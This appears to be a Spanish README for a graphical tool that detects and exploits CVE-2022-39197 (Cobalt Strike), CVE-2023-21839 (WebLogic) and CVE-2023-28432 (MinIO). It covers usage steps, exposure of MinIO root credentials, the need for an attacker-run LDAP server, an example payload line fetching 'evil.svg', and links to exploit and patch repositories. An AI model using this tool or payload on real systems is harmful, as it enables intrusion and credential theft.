
Una herramienta de prueba para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Una herramienta de prueba para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Herramienta gráfica de detección y explotación de vulnerabilidades para estos tres tipos de vulnerabilidades
Ejecutar el jar requiere Java 8
Orientado a un solo objetivo, no apto para escaneo de múltiples IPs
Al empaquetar, la explotación de la vulnerabilidad de Weblogic requiere hacer referencia a wlfullclient.jar, debe agregarlo usted mismo
java -jar Gui-poc-test.jar
Método de uso: hay dos botones, detección y explotación. La interfaz de la herramienta proporciona indicaciones según la vulnerabilidad.
Ingrese el objetivo, no es necesario ingresar el puerto, valor predeterminado 9000, puede cambiarlo, consulte el código fuente GuiDemo.java:línea 144
Muestra MINIO_ROOT_USER y MINIO_ROOT_PASSWORD, etc.
Ingrese la IP del objetivo, puerto, dirección del servidor LDAP
Detección:
Nota: La explotación de la vulnerabilidad requiere configurar su propio servidor LDAP (público)
Ejemplo de payload:
beacon.exe http://127.0.0.1:4444/evil.svg
Resultado: al ejecutar el troyano en Windows, el cliente de CS en macOS se conecta.
Al mismo tiempo, el lado de CS ejecuta el contenido del archivo JAR y abre la calculadora.
Windows registra la dirección de acceso de CS
Principio: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
https://github.com/its-arun/CVE-2022-39197
Parche de CS: https://github.com/burpheart/CVE-2022-39197-patch